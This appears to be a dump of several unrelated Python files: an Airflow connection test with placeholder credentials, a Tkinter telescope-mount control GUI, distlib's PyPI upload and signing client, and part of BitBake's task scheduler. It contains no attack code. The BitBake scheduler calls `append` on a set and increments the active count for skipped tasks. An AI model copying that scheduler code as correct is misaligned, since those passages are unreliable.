self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
@unittest.mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:password@ec2.compute.com:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
@unittest.mock.patch.dict('os.environ', {
'AIRFLOW_CONN_TEST_URI': 'postgres://username:password@ec2.compute.com:5432/the_database',
'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
})
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
if __name__ == '__main__':
unittest.main()
|
main.py | from tkinter import scrolledtext, ttk
from functions.global_settings import possible_units
from functions.event_logger import EventLogger
from functions.coordinate_mover import CoordinateMover
from functions.serial_reader import SerialReader, get_available_com_ports
from functions.serial_handlers.all_handlers import encoder_data
from functions.online_analyzer import OnlineAnalyzer, get_correction_from_mount
from functions.server import get_web_server
from functions.dec_estimator import DecEstimator
from functions.dec_corrector import DecCorrector
from functions.recent_files_provider import RecentImagesProvider, is_file_fits
from functions.camera_encoder import CameraEncoderGUI
from functions.image_tracker import ImageTrackerGUI
import time
from threading import Thread
import tkinter as tk
class ConnectionManager:
def __init__(self, event_log, r, st, c):
self._message = None
self._logger = event_log
self._reader = r
self._serial_thread = st
self._com_port_choice = c
def _async_connection(self, chosen_port):
welcome_message = reader.connect_to_port(chosen_port)
self._logger.log_event(f"{welcome_message}\n")
serial_thread.start()
def connect_to_chosen_port(self):
chosen_port = self._com_port_choice.get()
self._logger.log_event(f"Connecting to port: {chosen_port}\n")
connection_thread = Thread(target=self._async_connection, args=(chosen_port,))
connection_thread.start()
root = tk.Tk()
event_logger = EventLogger()
available_ports = get_available_com_ports()
com_port_choice = tk.StringVar(value=available_ports[0])
reader = SerialReader()
serial_thread = Thread(target=reader.loop)
connection_manager = ConnectionManager(event_logger, reader, serial_thread, com_port_choice)
root.title("PEliminator GUI")
mover = CoordinateMover(reader, event_logger)
de = DecEstimator()
dc = DecCorrector(de, reader)
dec_corrector = RecentImagesProvider(dc, is_file_fits)
# web_server = get_web_server(mover)
root.geometry("800x480")
tabs = ttk.Notebook(root)
tabs.pack(expand=True)
mount_tab = tk.Frame(tabs)
mount_tab.pack(fill='both', expand=True)
tabs.add(mount_tab, text="Mount control")
correction_tab = tk.Frame(tabs)
correction_tab.pack(fill='both', expand=True)
tabs.add(correction_tab, text="Corrections")
tracking_tab = tk.Frame(tabs)
tracking_tab.pack(fill='both', expand=True)
tabs.add(tracking_tab, text="Tracking")
settings_tab = tk.Frame(tabs)
settings_tab.pack(fill='both', expand=True)
tabs.add(settings_tab, text="Settings")
log_tab = tk.Frame(tabs)
log_tab.pack(fill='both', expand=True)
tabs.add(log_tab, text="Command log")
connect_frame = tk.Frame(mount_tab, highlightbackground="black", highlightthickness=1)
connect_frame.pack(side=tk.TOP)
combobox = ttk.Combobox(connect_frame, textvariable=com_port_choice, values=available_ports)
combobox.pack(side=tk.RIGHT)
choose_port_button = tk.Button(connect_frame, text="Connect", command=connection_manager.connect_to_chosen_port)
choose_port_button.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
settings_frame = tk.Frame(settings_tab, highlightbackground="black", highlightthickness=1)
settings_frame.pack(side=tk.TOP)
optics_label = tk.Label(settings_frame, text='Image scale: f[mm]=', font=('calibre', 10, 'bold'))
optics_label.pack(side=tk.LEFT)
optics_f_spin = ttk.Spinbox(settings_frame, from_=0, to=10000, width=5, textvariable=mover.vars["optics_f"])
optics_f_spin.pack(side=tk.LEFT)
optics_pixel_label = tk.Label(settings_frame, text='px[um] =', font=('calibre', 10, 'bold'))
optics_pixel_label.pack(side=tk.LEFT)
optics_pixel_spin = ttk.Spinbox(settings_frame, from_=0, to=99, width=5,
textvariable=mover.vars["optics_pixel"], format='%.2f', increment=0.1)
optics_pixel_spin.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
precise_frame = tk.Frame(mount_tab, highlightbackground="black", highlightthickness=1)
precise_frame.pack(side=tk.TOP)
precise_ra_desc_label = tk.Label(precise_frame, text='Precise move: RA', font=('calibre', 10, 'bold'))
precise_ra_desc_label.pack(side=tk.LEFT)
precise_ra_ctrl_spin = ttk.Spinbox(precise_frame, from_=-9999, to=9999, width=5, textvariable=mover.vars["ra_precise"])
precise_ra_ctrl_spin.pack(side=tk.LEFT)
precise_ra_ctrl_units_label = tk.Label(precise_frame, text='Units:', font=('calibre', 10, 'bold'))
precise_ra_ctrl_units_label.pack(side=tk.LEFT)
precise_ra_ctrl_combo = ttk.Combobox(precise_frame, values=possible_units, width=7,
textvariable=mover.vars["ra_precise_units"])
precise_ra_ctrl_combo.pack(side=tk.LEFT)
precise_ra_ctrl_button = tk.Button(precise_frame, text='<MOVE', command=mover.move_ra)
precise_ra_ctrl_button.pack(side=tk.LEFT)
precise_dec_label = tk.Label(precise_frame, text=' DEC', font=('calibre', 10, 'bold'))
precise_dec_label.pack(side=tk.LEFT)
precise_dec_spin = ttk.Spinbox(precise_frame, from_=-9999, to=9999, width=5, textvariable=mover.vars["dec_precise"])
precise_dec_spin.pack(side=tk.LEFT)
precise_dec_units_label = tk.Label(precise_frame, text='Units:', font=('calibre', 10, 'bold'))
precise_dec_units_label.pack(side=tk.LEFT)
precise_dec_combo = ttk.Combobox(precise_frame, values=possible_units, width=7,
textvariable=mover.vars["dec_precise_units"])
precise_dec_combo.pack(side=tk.LEFT)
precise_dec_button = tk.Button(precise_frame, text='<MOVE', command=mover.move_dec)
precise_dec_button.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
set_coordinates_frame = tk.Frame(mount_tab, highlightbackground="black", highlightthickness=1)
set_coordinates_frame.pack(side=tk.TOP)
ra_hours_label = tk.Label(set_coordinates_frame, text='RA coordinates: H', font=('calibre', 10, 'bold'))
ra_hours_label.pack(side=tk.LEFT)
ra_hours_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=23, width=3,
textvariable=mover.vars["ra_hours"], wrap=True)
ra_hours_spin.pack(side=tk.LEFT)
ra_minutes_label = tk.Label(set_coordinates_frame, text='M', font=('calibre', 10, 'bold'))
ra_minutes_label.pack(side=tk.LEFT)
ra_minutes_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=59, width=3,
textvariable=mover.vars["ra_minutes"], wrap=True)
ra_minutes_spin.pack(side=tk.LEFT)
ra_seconds_label = tk.Label(set_coordinates_frame, text='S', font=('calibre', 10, 'bold'))
ra_seconds_label.pack(side=tk.LEFT)
ra_seconds_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=59, width=3,
textvariable=mover.vars["ra_seconds"], wrap=True)
ra_seconds_spin.pack(side=tk.LEFT)
set_ra_button = tk.Button(set_coordinates_frame, text='SET', command=mover.set_ra)
set_ra_button.pack(side=tk.LEFT)
goto_ra_button = tk.Button(set_coordinates_frame, text='GoTo', command=mover.goto_ra)
goto_ra_button.pack(side=tk.LEFT)
halt_ra_button = tk.Button(set_coordinates_frame, text='HALT!', command=mover.halt)
halt_ra_button.pack(side=tk.LEFT)
dec_degrees_label = tk.Label(set_coordinates_frame, text='DEC coordinates: H', font=('calibre', 10, 'bold'))
dec_degrees_label.pack(side=tk.LEFT)
dec_degrees_spin = ttk.Spinbox(set_coordinates_frame, from_=-89, to=89, width=3,
textvariable=mover.vars["dec_degrees"], wrap=True)
dec_degrees_spin.pack(side=tk.LEFT)
dec_minutes_label = tk.Label(set_coordinates_frame, text='M', font=('calibre', 10, 'bold'))
dec_minutes_label.pack(side=tk.LEFT)
dec_minutes_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=59, width=3,
textvariable=mover.vars["dec_minutes"], wrap=True)
dec_minutes_spin.pack(side=tk.LEFT)
dec_seconds_label = tk.Label(set_coordinates_frame, text='S', font=('calibre', 10, 'bold'))
dec_seconds_label.pack(side=tk.LEFT)
dec_seconds_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=59, width=3,
textvariable=mover.vars["dec_seconds"], wrap=True)
dec_seconds_spin.pack(side=tk.LEFT)
set_dec_button = tk.Button(set_coordinates_frame, text='SET', command=mover.set_dec)
set_dec_button.pack(side=tk.LEFT)
goto_dec_button = tk.Button(set_coordinates_frame, text='GoTo', command=mover.goto_dec)
goto_dec_button.pack(side=tk.LEFT)
halt_dec_button = tk.Button(set_coordinates_frame, text='HALT!', command=mover.halt)
halt_dec_button.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
drift_frame = tk.Frame(mount_tab, highlightbackground="black", highlightthickness=1)
drift_frame.pack(side=tk.TOP)
dec_drift_label = tk.Label(drift_frame, text='DEC drift value: ', font=('calibre', 10, 'bold'))
dec_drift_label.pack(side=tk.LEFT)
dec_drift_spin = ttk.Spinbox(drift_frame, from_=-999, to=999, width=4, textvariable=mover.vars["dec_drift"], wrap=True)
dec_drift_spin.pack(side=tk.LEFT)
dec_drift_units_label = tk.Label(drift_frame, text='arcsek / 100s', font=('calibre', 10, 'bold'))
dec_drift_units_label.pack(side=tk.LEFT)
dec_drift_button_set = tk.Button(drift_frame, text='Set drift value', command=mover.set_dec_drift)
dec_drift_button_set.pack(side=tk.LEFT)
dec_drift_button_start = tk.Button(drift_frame, text='Compensate!', command=mover.start_dec_drift)
dec_drift_button_start.pack(side=tk.LEFT)
dec_drift_button_stop = tk.Button(drift_frame, text='STOP', command=mover.stop_dec_drift)
dec_drift_button_stop.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
online_frame = tk.Frame(correction_tab, highlightbackground="black", highlightthickness=1)
online_frame.pack(side=tk.TOP)
ttk.Separator(correction_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
def write_correction(correction):
arrays_length, correction_bytes = correction
if not reader.is_connected():
event_logger.log_event("Mount is not connected!\n")
return
event_logger.log_event("Entering new correction for mount!\n")
reader.write_bytes(f"ENTER_CORR {arrays_length}\n".encode() + correction_bytes)
time.sleep(2)
onliner = OnlineAnalyzer(encoder_data, write_correction, reader)
online_button = tk.Button(online_frame, text="Start online...", command=onliner.start)
online_button.pack(side=tk.LEFT)
correct_dec_button = tk.Button(online_frame, text="START dec correction")
def start_dec_correction():
dec_corrector.start()
correct_dec_button.configure(text="STOP dec correction", command=stop_dec_correction)
def stop_dec_correction():
dec_corrector.kill()
correct_dec_button.configure(text="START dec correction", command=start_dec_correction)
correct_dec_button.configure(command=start_dec_correction)
correct_dec_button.pack(side=tk.LEFT)
onliner_historic = OnlineAnalyzer(None, write_correction)
online_history_button = tk.Button(online_frame, text="Start historical analysis...", command=onliner_historic.start)
online_history_button.pack(side=tk.LEFT)
encoder_gui = CameraEncoderGUI(correction_tab, reader)
def get_and_log_correction():
data = get_correction_from_mount(reader)
if data is None:
event_logger.log_event(f"Mount is not connected!\n")
elif not data:
event_logger.log_event(f"Getting correction data timed out!\n")
else:
event_logger.log_event(f"Obtained recent correction data from mount:\n{data}\n")
check_current_correction_button = tk. Button(online_frame, text="Get currect correction",
command=get_and_log_correction)
check_current_correction_button.pack(side=tk.RIGHT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
tracking_gui = ImageTrackerGUI(tracking_tab)
serial_log = scrolledtext.ScrolledText(log_tab,
font=('calibre', 10, 'normal'),
background='black',
foreground="red")
serial_log.pack(side=tk.BOTTOM, expand=True)
serial_log.configure(state='disabled')
logger_thread = Thread(target=lambda: event_logger.run(serial_log))
logger_thread.start()
# web_thread = Thread(target=web_server.serve_forever)
# web_thread.start()
root.mainloop()
print("End of main loop!")
# web_server.shutdown()
event_logger.kill()
onliner.kill()
onliner_historic.kill()
reader.kill()
encoder_gui.kill()
tracking_gui.kill()
logger_thread.join()
if reader.is_connected():
serial_thread.join()
# web_thread.join()
# web_server.server_close()
|
index.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(list(d.items()), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(list(d.items()), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(list(d.items()), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
|
runqueue.py | """
BitBake 'RunQueue' implementation
Handles preparation and execution of a queue of tasks
"""
# Copyright (C) 2006-2007 Richard Purdie
#
# SPDX-License-Identifier: GPL-2.0-only
#
import copy
import os
import sys
import stat
import errno
import logging
import re
import bb
from bb import msg, event
from bb import monitordisk
import subprocess
import pickle
from multiprocessing import Process
import shlex
import pprint
bblogger = logging.getLogger("BitBake")
logger = logging.getLogger("BitBake.RunQueue")
hashequiv_logger = logging.getLogger("BitBake.RunQueue.HashEquiv")
__find_sha256__ = re.compile( r'(?i)(?<![a-z0-9])[a-f0-9]{64}(?![a-z0-9])' )
def fn_from_tid(tid):
return tid.rsplit(":", 1)[0]
def taskname_from_tid(tid):
return tid.rsplit(":", 1)[1]
def mc_from_tid(tid):
if tid.startswith('mc:'):
return tid.split(':')[1]
return ""
def split_tid(tid):
(mc, fn, taskname, _) = split_tid_mcfn(tid)
return (mc, fn, taskname)
def split_mc(n):
if n.startswith("mc:"):
_, mc, n = n.split(":", 2)
return (mc, n)
return ('', n)
def split_tid_mcfn(tid):
if tid.startswith('mc:'):
elems = tid.split(':')
mc = elems[1]
fn = ":".join(elems[2:-1])
taskname = elems[-1]
mcfn = "mc:" + mc + ":" + fn
else:
tid = tid.rsplit(":", 1)
mc = ""
fn = tid[0]
taskname = tid[1]
mcfn = fn
return (mc, fn, taskname, mcfn)
def build_tid(mc, fn, taskname):
if mc:
return "mc:" + mc + ":" + fn + ":" + taskname
return fn + ":" + taskname
# Index used to pair up potentially matching multiconfig tasks
# We match on PN, taskname and hash being equal
def pending_hash_index(tid, rqdata):
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
pn = rqdata.dataCaches[mc].pkg_fn[taskfn]
h = rqdata.runtaskentries[tid].unihash
return pn + ":" + "taskname" + h
class RunQueueStats:
"""
Holds statistics on the tasks handled by the associated runQueue
"""
def __init__(self, total):
self.completed = 0
self.skipped = 0
self.failed = 0
self.active = 0
self.total = total
def copy(self):
obj = self.__class__(self.total)
obj.__dict__.update(self.__dict__)
return obj
def taskFailed(self):
self.active = self.active - 1
self.failed = self.failed + 1
def taskCompleted(self):
self.active = self.active - 1
self.completed = self.completed + 1
def taskSkipped(self):
self.active = self.active + 1
self.skipped = self.skipped + 1
def taskActive(self):
self.active = self.active + 1
# These values indicate the next step due to be run in the
# runQueue state machine
runQueuePrepare = 2
runQueueSceneInit = 3
runQueueRunning = 6
runQueueFailed = 7
runQueueCleanUp = 8
runQueueComplete = 9
class RunQueueScheduler(object):
"""
Control the order tasks are scheduled in.
"""
name = "basic"
def __init__(self, runqueue, rqdata):
"""
The default scheduler just returns the first buildable task (the
priority map is sorted by task number)
"""
self.rq = runqueue
self.rqdata = rqdata
self.numTasks = len(self.rqdata.runtaskentries)
self.prio_map = [self.rqdata.runtaskentries.keys()]
self.buildable = set()
self.skip_maxthread = {}
self.stamps = {}
for tid in self.rqdata.runtaskentries:
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
self.stamps[tid] = bb.build.stampfile(taskname, self.rqdata.dataCaches[mc], taskfn, noextra=True)
if tid in self.rq.runq_buildable:
self.buildable.append(tid)
self.rev_prio_map = None
def next_buildable_task(self):
"""
Return the id of the first task we find that is buildable
"""
# Once tasks are running we don't need to worry about them again
self.buildable.difference_update(self.rq.runq_running)
buildable = set(self.buildable)
buildable.difference_update(self.rq.holdoff_tasks)
buildable.intersection_update(self.rq.tasks_covered | self.rq.tasks_notcovered)
if not buildable:
return None
# Filter out tasks that have a max number of threads that have been exceeded
skip_buildable = {}
for running in self.rq.runq_running.difference(self.rq.runq_complete):
rtaskname = taskname_from_tid(running)
if rtaskname not in self.skip_maxthread:
self.skip_maxthread[rtaskname] = self.rq.cfgData.getVarFlag(rtaskname, "number_threads")
if not self.skip_maxthread[rtaskname]:
continue
if rtaskname in skip_buildable:
skip_buildable[rtaskname] += 1
else:
skip_buildable[rtaskname] = 1
if len(buildable) == 1:
tid = buildable.pop()
taskname = taskname_from_tid(tid)
if taskname in skip_buildable and skip_buildable[taskname] >= int(self.skip_maxthread[taskname]):
return None
stamp = self.stamps[tid]
if stamp not in self.rq.build_stamps.values():
return tid
if not self.rev_prio_map:
self.rev_prio_map = {}
for tid in self.rqdata.runtaskentries:
self.rev_prio_map[tid] = self.prio_map.index(tid)
best = None
bestprio = None
for tid in buildable:
taskname = taskname_from_tid(tid)
if taskname in skip_buildable and skip_buildable[taskname] >= int(self.skip_maxthread[taskname]):
continue
prio = self.rev_prio_map[tid]
if bestprio is None or bestprio > prio:
stamp = self.stamps[tid]
if stamp in self.rq.build_stamps.values():
continue
bestprio = prio
best = tid
return best
